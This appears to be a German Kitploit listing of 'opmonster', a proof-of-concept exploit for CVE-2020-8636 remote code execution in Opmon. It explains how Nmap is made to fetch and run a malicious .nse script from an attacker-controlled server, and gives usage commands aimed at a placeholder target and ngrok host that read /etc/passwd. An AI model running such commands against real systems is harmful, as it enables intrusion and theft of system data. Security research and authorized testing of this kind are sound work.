Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
opmonster — CVE-2020-8636 authentifizierter Remote-Code-Execution-Exploit für Opmon | Kitploit
Tools/GitHubGitHub/phor3nsic/opmonster
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 authentifizierter Remote-Code-Execution-Exploit für Opmon

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OpMonster

CVE-2020-8636 — Authentifizierter Remote-Codeausführungs-Exploit für Opmon

Über • Installation • Verwendung • Lizenz

language last commit license stars

OpMonster

Über

OpMonster ist ein Proof-of-Concept-Exploit für CVE-2020-8636, eine Schwachstelle zur Remote-Codeausführung in der Überwachungsplattform Opmon. Er missbraucht den nettools.php-Endpunkt, mit dem Sie Nmap mit beliebigen --script-Optionen ausführen können. Der Exploit veranlasst Opmon, ein schädliches .nse-Nmap-Skript von einem von Ihnen kontrollierten Server abzurufen (über http-fetch), legt es in /tmp ab und führt es anschließend aus, um Ihren Befehl auf dem Zielsystem auszuführen und die Ausgabe auszugeben.

Entdeckt und entwickelt von @phor3nsic. Weitere Details: Drei CVEs zu Opmon.

Installation

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Verwendung

Starten Sie zunächst einen Webserver auf einem Host, den das Zielsystem erreichen kann, in einem Verzeichnis, aus dem das generierte .nse-Skript heruntergeladen werden kann (der Exploit schreibt das Skript in das aktuelle Verzeichnis):

root@kitploit:~
php -S 0.0.0.0:1337

Führen Sie dann den Exploit mit vier Positionsargumenten aus:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"

Der Exploit bricht mit einer Meldung ab, wenn das Zielsystem das Skript nicht herunterlädt ("nicht verwundbar") oder keine ausgehende Verbindung zu Ihrem Server herstellen kann.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Sie sind dafür verantwortlich, wie Sie es verwenden.

Lizenz

MIT © phor3nsic

Tool herunterladen
ArgumentBeschreibung
HOSTBasis-URL des Ziel-Opmon (z. B. https://vulnhost.com)
LHOSTHost Ihres Servers, der das .nse-Skript bereitstellt
LPORTPort Ihres Servers
CMDAuf dem Zielsystem auszuführender Befehl